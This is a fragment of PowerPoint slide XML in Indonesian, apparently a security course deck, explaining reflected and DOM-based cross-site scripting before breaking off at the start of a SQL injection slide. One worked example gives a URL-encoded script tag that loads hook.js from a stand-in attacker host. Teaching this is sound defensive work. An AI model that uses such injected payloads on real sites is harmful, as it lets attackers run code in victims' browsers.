              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input di situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>papan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kotak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> input dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menampilkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di header. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>https://trusted.foo/messages?user=james </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>https://trusted.foo/messages? user=James%3Cscript%20src%3D%22https%3A%2F% 2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DOM yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disematkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> parameter: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>James&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>="https://badsite.foo/hook. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DOM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "James" pada header, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hook.js pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Skrip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs (XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanipulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DOM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyuntikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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181</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="330958835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Injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> SQL (SQLi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>injeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kueri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kueri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> record </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
